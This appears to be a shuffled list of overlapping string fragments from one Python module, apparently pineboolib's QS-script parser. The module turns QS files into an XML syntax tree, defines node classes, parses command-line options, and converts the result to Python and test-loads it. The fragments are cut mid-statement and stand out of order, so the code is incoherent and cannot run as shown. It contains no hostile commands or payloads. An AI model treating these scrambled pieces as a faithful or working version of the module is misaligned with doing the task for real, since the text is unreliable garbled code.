"[\"source\", \"basicsource\", \"classdeclarationsource\", \"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject):",
"argn, vtype, value): if argn == 0: self.xml.set(\"mode\", vtype) def polish(self): # if",
"def add_other(self, argn, vtype, data): if self.debug_other: self.xml.set(\"arg%02d\" % argn, vtype) def polish(self):",
"= True debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True",
"except Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text",
"= self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname,",
"getxmltagname(tagname): if tagname == \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\"",
"\"Class\" if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types =",
"= [\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\" return self",
"can_process_tag(self, tagname): return tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml",
"argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def",
"1: return self.subelems[0] return self class ListObject(TagObject): set_child_argn = False debug_other = False",
"def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject):",
"adopt_childs_tags = ['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags =",
"= \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def",
"= ['vardecl_list'] class VariableType(NamedObject): tags = [\"optvartype\"] def polish(self): if self.xmlname is None:",
"\".qs.py\") for arg in args]) except Exception: print(\"Error al ejecutar Python:\") print(traceback.format_exc()) print(\"Done.\")",
"= True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\",",
"help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\",",
"Member(TagObject): debug_other = False set_child_argn = False tags = [\"member_var\", \"member_call\"] adopt_childs_tags =",
"args = parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full =",
"= [\"dowhilestatement\"] class ForIn(ListObject): tags = [\"forinstatement\"] class With(ListObject): tags = [\"withstatement\"] class",
"= False set_child_argn = False tags = [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class",
"0: self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems) ==",
"\"Parsing File: %-35s . . . . (%.1f%%) \" % (bname, 100.0 *",
"\"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname)) class FunctionAnon(ListObject): tags = [\"funcdeclaration_anon\"] class",
"FunctionCall(NamedObject): tags = [\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags =",
"print(\"%s: \" % bname + (\"\\n%s: \" % bname).join(text.splitlines())) else: if options.cache: args",
"name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory):",
"OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\",",
"parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class Module(object): def __init__(self, name, path):",
"argn, subelem): if subelem.is_in(self.omit_tags): return self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback",
"lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS",
"path) if not mod.loadModule(): print(\"Error cargando modulo %s\" % name) elif options.topython: from",
"python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\") parser.add_option(\"--full\", action=\"store_true\",",
"optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\",",
"\"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\", \"optid\"] def polish(self): if self.xmlname is None:",
"= len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write(",
"[\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\" return self class",
"class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False class TypedObject(ListObject):",
"elif options.topython: from .pytnyzer import pythonize import io if options.cache: args = [x",
"vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn,",
"return def is_in(self, listobj): return self.__class__ in listobj or self.astname in listobj def",
"= value[1:-1] self.xml.set(\"delim\", \"'\") if vtype == \"RCONST\": vtype = \"Regex\" if vtype",
"str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options, args): if options.optdebug: print(options,",
"create_xml(tagname) i = 0 for k, v in treedata['content']: if type(v) is dict:",
"= parseArgs([]) options.full = True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist)",
"InlineUpdate(ListObject): tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn",
"if tagname == \"vardeclaration\": return \"Variable\" return \"Unknown.%s\" % tagname xml_class_types = []",
"tags = [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn ==",
"in listobj: return listobj[self.__class__] if self.astname in listobj: return listobj[self.astname] return default def",
"class With(ListObject): tags = [\"withstatement\"] class TryCatch(ListObject): tags = [\"trycatch\"] class New(ListObject): tags",
"fp.close() return result def parseArgs(argv): parser = OptionParser() parser.add_option(\"-q\", \"--quiet\", action=\"store_false\", dest=\"verbose\", default=True,",
"for nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File:",
"try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython =",
"tags = [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class",
"xml\") parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\",",
"= post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s \\n\" %",
"xml file from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\")",
"x in args if not os.path.exists((x + \".py\").replace(\".qs.xml.py\", \".qs.py\")) or os.path.getmtime(x) > os.path.getctime((x",
"\"empty\" return self class Function(ListNamedObject): tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] =",
"os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\") else: destname = filename",
"nf, filename in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s",
"don't regenerate it\") (options, args) = parser.parse_args(argv) return (options, args) def main(): options,",
"[\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"returns\", str(subelem.xmlname))",
"if cls.can_process_tag(tagname): classobj = cls break if classobj is None: return None return",
"from builtins import str from builtins import object from optparse import OptionParser import",
"import etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS =",
"callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem) if self.set_child_argn: subelem.xml.set(\"argn\", str(argn))",
"in enumerate(args): bname = os.path.basename(filename) if options.storepath: destname = os.path.join(options.storepath, bname + \".py\")",
"'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject):",
"= NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject):",
"= False @classmethod def tagname(self, tagname): return tagname @classmethod def can_process_tag(self, tagname): return",
"if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\"",
"== \"source\": return \"Source\" if tagname == \"funcdeclaration\": return \"Function\" if tagname ==",
"= False tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False",
"instruction) elif k in USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i",
"value): self.values.append((vtype, value)) if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None:",
"class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at the end.",
"len(self.subelems) == 1: # self.subelems[0].xml.set(\"mode\",self.xml.get(\"mode\")) # return self.subelems[0] return self class Class(ListNamedObject): tags",
"tags = [\"funcdeclaration_anon\"] class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"]",
"ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname = \"empty\"",
"class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True",
"set_child_argn = False debug_other = False class NamedObject(TagObject): name_is_first_id = True debug_other =",
"print(\"Pass 1 - Parse and write XML file . . .\") try: execute(options,",
"+ \".xml\" f1 = open(destname, \"wb\") f1.write(etree.tostring(ast, pretty_print=True)) f1.close() if __name__ == \"__main__\":",
"print(filelist) def execute(options, args): if options.optdebug: print(options, args) if options.full: execpython = options.exec_python",
"['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class",
"if self.promote_child_if_alone: if len(self.values) == 0 and len(self.subelems) == 1: return self.subelems[0] return",
"from optparse import OptionParser import os import os.path import sys import imp import",
"name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue",
"for cls in xml_class_types: if cls.can_process_tag(tagname): classobj = cls break if classobj is",
"False tags = [\"storeinstruction\"] class InstructionFlow(TypedObject): debug_other = True tags = [\"flowinstruction\"] class",
"return self.__class__ in listobj or self.astname in listobj def get(self, listobj, default=None): if",
"Else(ListObject): tags = [\"optelse\"] def polish(self): if len(self.subelems) == 0: self.astname = \"empty\"",
"execpython: options.exec_python = execpython if options.verbose: print(\"Pass 3 - Test PY file load",
"0 def add_other(self, argn, vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class",
"args) def pythonify(filelist): options, args = parseArgs([]) options.full = True if isinstance(filelist, str):",
"None try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML",
"default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\", dest=\"cache\", default=False, help=\"If dest file",
"xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\",",
"= [\"array_member\"] adopt_childs_tags = ['variable_1', \"func_call\"] class InstructionCall(TagObject): debug_other = False tags =",
"class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject): tags = [\"switch\"] adopt_childs_tags = ['case_cblock_list',",
"args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no",
"= [\"constant\"] def add_value(self, argn, vtype, value): value = str(value) # str(value,\"ISO-8859-15\",\"replace\") if",
"os.path.join(self.path, self.name) fp = open(pathname) name = self.name[:self.name.find(\".\")] # fp, pathname, description =",
"subelem): self.xml.set(\"type\", str(subelem.xmlname)) class DeclarationBlock(ListObject): tags = [\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self,",
"import qsatype for filename in args: realpath = os.path.realpath(filename) path, name = os.path.split(realpath)",
"debug_other = False class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value):",
"else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags = [\"updateinstruction\"] class Switch(ListObject):",
"tags = [\"callinstruction\"] class InstructionStore(TagObject): promote_child_if_alone = True debug_other = False tags =",
"vtype == \"CCONST\": vtype = \"String\" value = value[1:-1] self.xml.set(\"delim\", \"'\") if vtype",
"class TypedObject(ListObject): type_arg = 0 def add_other(self, argn, vtype, value): if argn ==",
"[\"vardeclaration\"] adopt_childs_tags = ['vardecl_list'] def add_other(self, argn, vtype, value): if argn == 0:",
"import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS = {} def parse_for(*tagnames):",
"class While(ListObject): tags = [\"whilestatement\"] class For(ListObject): tags = [\"forstatement\"] class ForInitialize(ListObject): tags",
"to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False, help=\"write xml file from qs\")",
"i = 0 for k, v in treedata['content']: if type(v) is dict: instruction",
"self.subelems[0] return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] =",
"imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp, pathname, description) result = True except FileNotFoundError: print(\"Fichero",
"tagname): return tagname @classmethod def can_process_tag(self, tagname): return True # ----------------- def create_xml(tagname):",
"loadModule(self): fp = None try: description = ('.py', 'U', imp.PY_SOURCE) # description =",
"= stream.getvalue() if len(text) > 2: print(\"%s: \" % bname + (\"\\n%s: \"",
".\") try: execute(options, args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython",
"Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags = [\"funccall_1\"]",
"value): self.xml.set(\"type\", vtype) if argn == 0: self.xml.set(\"mode\", \"update-read\") if argn == 1:",
"optparse import OptionParser import os import os.path import sys import imp import traceback",
"OpUnary(TypedObject): tags = [\"unary_operator\"] class OpTernary(ListObject): tags = [\"ternary_operator\"] class OpUpdate(TypedObject): tags =",
"default=False, help=\"debug optparse module\") parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\")",
"class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags",
"= {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n in tagnames: KNOWN_PARSERS[n]",
"self.astname = tagname self.xml = etree.Element(self.tagname(tagname)) self.xmlname = None self.subelems = [] self.values",
"= True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False",
"None: print(\"No se pudo analizar %-35s \\n\" % (repr(filename))) continue if options.storepath: destname",
"help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store XML results in PATH\")",
"bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id =",
"polish(self): if self.xmlname is None: self.astname = \"empty\" return self class ExtendsType(NamedObject): tags",
"= old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \" % bname",
"in args]) except Exception: print(\"Error convirtiendo:\") print(traceback.format_exc()) if execpython: options.exec_python = execpython if",
"bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object, metaclass=TagObjectFactory): tags",
"write PY file . . .\") try: execute(options, [arg + \".xml\" for arg",
"def parse_unknown(tagname, treedata): xmlelem = create_xml(tagname) i = 0 for k, v in",
"class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"] class FunctionCall(NamedObject): tags =",
"%-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog:",
"args) = parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options,",
"if options.optdebug: print(options, args) if options.full: execpython = options.exec_python options.exec_python = False options.full",
"class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self,",
"= True if isinstance(filelist, str): filelist = [filelist] execute(options, filelist) print(filelist) def execute(options,",
"# Si no se quiere guardar resultado, no hace falta calcular mas continue",
"from qs\") parser.add_option(\"--full\", action=\"store_true\", dest=\"full\", default=False, help=\"write xml file from qs\") parser.add_option(\"--cache\", action=\"store_true\",",
"\"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if tagname == \"vardeclaration\":",
"parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args) def",
"[\"deleteinstruction\"] class Parentheses(ListObject): tags = [\"parentheses\"] adopt_childs_tags = ['base_expression'] class OpUnary(TypedObject): tags =",
"def polish(self): if len(self.values) == 0 and len(self.subelems) == 1: # if isinstance(self.subelems[0],",
"args) except Exception: print(\"Error parseando:\") print(traceback.format_exc()) options.toxml = False options.topython = True if",
"tagname): return tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml =",
"class ExtendsType(NamedObject): tags = [\"optextends\"] def polish(self): if self.xmlname is None: self.astname =",
"= parser.parse_args(argv) return (options, args) def main(): options, args = parseArgs(sys.argv[1:]) execute(options, args)",
"parseArgs(sys.argv[1:]) execute(options, args) def pythonify(filelist): options, args = parseArgs([]) options.full = True if",
"return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class VariableType(NamedObject): tags",
"argn, subelem): return def is_in(self, listobj): return self.__class__ in listobj or self.astname in",
"False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn = False debug_other = False class",
"self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self, argn, vtype, data):",
"Exception: print(\"Error al pythonificar %r:\" % filename) print(traceback.format_exc()) sys.stdout = old_stderr text =",
"= {} UNKNOWN_PARSERS = {} def parse_for(*tagnames): global KNOWN_PARSERS def decorator(fn): for n",
"if classobj is None: return None return classobj(tagname) def parse_unknown(tagname, treedata): xmlelem =",
"class FunctionAnonExec(ListObject): tags = [\"funcdeclaration_anon_exec\"] class Variable(NamedObject): tags = [\"vardecl\"] callback_subelem = NamedObject.callback_subelem.copy()",
"sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \" %",
"convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if not tree_data: print(\"No se pudo",
"vtype, value): if argn == self.type_arg: self.xml.set(\"type\", vtype) class Source(ListObject): tags = [\"source\",",
"fichero %-35s \\n\" % (repr(filename)), e) continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not",
"dest=\"verbose\", default=True, help=\"don't print status messages to stdout\") parser.add_option(\"--optdebug\", action=\"store_true\", dest=\"optdebug\", default=False, help=\"debug",
"= filename + \".py\" destname = destname.replace(\".qs.xml.py\", \".qs.py\") if not os.path.exists(filename): print(\"Fichero %r",
"try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg in args]) except Exception:",
"= True if options.verbose: print(\"Pass 2 - Pythonize and write PY file .",
"import traceback from lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError:",
"os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write( \"Pythonizing File:",
"in PATH\") parser.add_option(\"--topython\", action=\"store_true\", dest=\"topython\", default=False, help=\"write python file from xml\") parser.add_option(\"--exec-py\", action=\"store_true\",",
"= [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem): for child in",
"self.omit_subelem(argn, subelem) if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return",
"= \"Expression\" return self.subelems[0] else: self.xml.tag = \"Value\" return self class InstructionUpdate(ListObject): tags",
"\" % bname).join(text.splitlines())) else: if options.cache: args = [x for x in args",
"= \"empty\" return self class Arguments(ListObject): tags = [\"arglist\"] adopt_childs_tags = ['vardecl_list'] class",
"flscriptparse except ImportError: import flscriptparse USEFUL_TOKENS = \"ID,ICONST,FCONST,SCONST,CCONST,RXCONST\".split(\",\") KNOWN_PARSERS = {} UNKNOWN_PARSERS =",
"----- keep this one at the end. class Unknown(TagObject): promote_child_if_alone = True set_child_argn",
"= execpython if options.verbose: print(\"Pass 3 - Test PY file load . .",
"% (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() try:",
"if subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn,",
"# ----------------- def create_xml(tagname): classobj = None for cls in xml_class_types: if cls.can_process_tag(tagname):",
"= 0 for k, v in treedata['content']: if type(v) is dict: instruction =",
"FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False except Exception as",
"in enumerate(args): bname = os.path.basename(filename) if options.verbose: sys.stdout.write( \"Parsing File: %-35s . .",
"= os.path.split(realpath) if not os.path.exists(realpath): print(\"Fichero no existe: %s\" % name) continue mod",
"subelem.is_in(self.adopt_childs_tags): return self.adopt_children(argn, subelem) callback = subelem.get(self.callback_subelem) if callback: return getattr(self, callback)(argn, subelem)",
"\"add_exttype\" def add_exttype(self, argn, subelem): self.xml.set(\"extends\", str(subelem.xmlname)) class Member(TagObject): debug_other = False set_child_argn",
"if tagname == \"funcdeclaration\": return \"Function\" if tagname == \"classdeclaration\": return \"Class\" if",
"if self.xmlname is None: self.astname = \"empty\" return self class Function(ListNamedObject): tags =",
"0 and len(self.subelems) == 1: # if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\":",
"parser.add_option(\"--exec-py\", action=\"store_true\", dest=\"exec_python\", default=False, help=\"try to execute python file\") parser.add_option(\"--toxml\", action=\"store_true\", dest=\"toxml\", default=False,",
"bname).join(text.splitlines())) else: if options.cache: args = [x for x in args if not",
"% (bname, 100.0 * (nf + 1.0) / nfs)) if options.verbose: sys.stdout.flush() old_stderr",
"options.toxml: # Si no se quiere guardar resultado, no hace falta calcular mas",
"try: tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\"",
"parser.add_option(\"--debug\", action=\"store_true\", dest=\"debug\", default=False, help=\"prints lots of useless messages\") parser.add_option(\"--path\", dest=\"storepath\", default=None, help=\"store",
"ast = post_parse(tree_data) if ast is None: print(\"No se pudo analizar %-35s \\n\"",
"import pythonize import io if options.cache: args = [x for x in args",
"if len(self.subelems) == 0: self.astname = \"empty\" return self class DictObject(ListObject): tags =",
"execpython if options.verbose: print(\"Pass 3 - Test PY file load . . .\")",
"= [\"inlinestoreinstruction\"] def add_other(self, argn, vtype, value): self.xml.set(\"type\", vtype) if argn == 0:",
"continue prog = flscriptparse.parse(filecontent) sys.stdout.write(\"\\r\") if not prog: print(\"Error: No se pudo abrir",
"True tags = [\"flowinstruction\"] class Instruction(TagObject): promote_child_if_alone = True debug_other = False tags",
"name_is_first_id = True debug_other = False class ListNamedObject(TagObject): name_is_first_id = True set_child_argn =",
"if not os.path.exists(filename): print(\"Fichero %r no encontrado\" % filename) continue if options.verbose: sys.stdout.write(",
"subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn'] self.xml.append(child)",
"= os.path.join(options.storepath, bname + \".xml\") else: destname = filename + \".xml\" f1 =",
"[\"case_block\"] class CaseDefault(ListObject): tags = [\"case_default\"] class While(ListObject): tags = [\"whilestatement\"] class For(ListObject):",
"or os.path.getmtime(x) > os.path.getctime(x + \".xml\")] nfs = len(args) for nf, filename in",
"__init__(cls, name, bases, dct): global xml_class_types xml_class_types.append(cls) super(TagObjectFactory, cls).__init__(name, bases, dct) class TagObject(object,",
"debug_other = False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags =",
"tree_data = flscriptparse.calctree(prog, alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" %",
"description) result = True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result",
"\"statement_list\", \"statement_block\"] adopt_childs_tags = ['source_element', 'statement_list', 'statement', \"statement_block\"] class Identifier(NamedObject): tags = [\"identifier\",",
"if isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else:",
"i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print",
"name = self.name[:self.name.find(\".\")] # fp, pathname, description = imp.find_module(self.name,[self.path]) self.module = imp.load_module(name, fp,",
"fn = parse_unknown else: fn = KNOWN_PARSERS[tagname] return fn(tagname, treedata) def getxmltagname(tagname): if",
"return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS if tagname not",
"import io if options.cache: args = [x for x in args if not",
".\") options.topython = False try: execute( options, [(arg + \".xml.py\").replace(\".qs.xml.py\", \".qs.py\") for arg",
"USEFUL_TOKENS: xmlelem.add_value(i, k, v) else: xmlelem.add_other(i, k, v) i += 1 return xmlelem.polish()",
"% name) elif options.topython: from .pytnyzer import pythonize import io if options.cache: args",
"print(traceback.format_exc()) sys.stdout = old_stderr text = stream.getvalue() if len(text) > 2: print(\"%s: \"",
"= value self.const_type = vtype self.xml.set(\"type\", vtype) self.xml.set(\"value\", value) class InlineUpdate(ListObject): tags =",
"\".py\").replace(\".qs.xml.py\", \".qs.py\"))] nfs = len(args) for nf, filename in enumerate(args): bname = os.path.basename(filename)",
"[\"funccall_1\"] class CallArguments(ListObject): tags = [\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self,",
"[\"ternary_operator\"] class OpUpdate(TypedObject): tags = [\"updateoperator\"] # ----- keep this one at the",
"return tagname in self.tags def __init__(self, tagname): self.astname = tagname self.xml = etree.Element(self.tagname(tagname))",
"in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn' in child.attrib: del child.attrib['argn']",
"0 for k, v in treedata['content']: if type(v) is dict: instruction = parse(k,",
"if vtype == \"ID\" and self.name_is_first_id and self.xmlname is None: self.xmlname = value",
"class TagObject(object, metaclass=TagObjectFactory): tags = [] set_child_argn = False name_is_first_id = False debug_other",
"elif options.exec_python: # import qsatype for filename in args: realpath = os.path.realpath(filename) path,",
"options.verbose: sys.stdout.flush() try: filecontent = open(filename, \"r\", encoding=\"latin-1\").read() filecontent = flscriptparse.cleanNoPython(filecontent) except Exception",
"isinstance(self.subelems[0], Constant): if self.subelems[0].xml.tag == \"base_expression\": self.subelems[0].xml.tag = \"Expression\" return self.subelems[0] else: self.xml.tag",
"pudo abrir %-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d",
"['dictobject_value_elemlist', \"dictobject_value\"] class DictElem(ListObject): tags = [\"dictobject_value_elem\"] class ExpressionContainer(ListObject): tags = [\"expression\"] #",
"= [] self.values = [] if self.name_is_first_id: self.xml.set(\"name\", \"\") def adopt_children(self, argn, subelem):",
"KNOWN_PARSERS[n] = fn return fn return decorator def parse(tagname, treedata): global KNOWN_PARSERS, UNKNOWN_PARSERS",
"= [\"case_block_list\"] adopt_childs_tags = ['case_cblock_list', 'case_block_list'] class Case(ListObject): tags = [\"case_block\"] class CaseDefault(ListObject):",
"tagname): return True # ----------------- def create_xml(tagname): classobj = None for cls in",
"argn, subelem): for child in subelem.xml.iterchildren(): if self.set_child_argn: child.set(\"argn\", str(argn)) else: if 'argn'",
"True tags = [\"mathoperator\"] class Compare(TypedObject): debug_other = True tags = [\"cmp_symbol\", \"boolcmp_symbol\"]",
"alias_mode=0) except Exception: print(\"Error al convertir a XML %r:\" % bname) print(\"\\n\".join(traceback.format_exc().splitlines()[-7:])) if",
"tags = [\"funcdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[VariableType] = \"add_vartype\" def add_vartype(self, argn, subelem):",
"k, v) i += 1 return xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata)",
"%-35s \\n\" % (repr(filename))) continue if prog[\"error_count\"] > 0: print(\"Encontramos %d errores parseando:",
"from lxml import etree try: from pineboolib.flparser import flscriptparse except ImportError: import flscriptparse",
"self.xml.set(\"mode\", vtype) def polish(self): # if len(self.values) == 0 and len(self.subelems) == 1:",
"self.xml.set(\"name\", value) return self.xml.set(\"arg%02d\" % argn, vtype + \":\" + repr(value)) def add_other(self,",
"False tags = [\"instruction\"] class OpMath(TypedObject): debug_other = True tags = [\"mathoperator\"] class",
"xmlelem.polish() def post_parse(treedata): source = parse(\"source\", treedata) # print UNKNOWN_PARSERS.keys() return source.xml class",
"= True except FileNotFoundError: print(\"Fichero %r no encontrado\" % self.name) result = False",
"[\"callargs\"] class Constant(ListObject): tags = [\"constant\"] def add_value(self, argn, vtype, value): value =",
"return self class Class(ListNamedObject): tags = [\"classdeclaration\"] callback_subelem = ListNamedObject.callback_subelem.copy() callback_subelem[ExtendsType] = \"add_exttype\"",
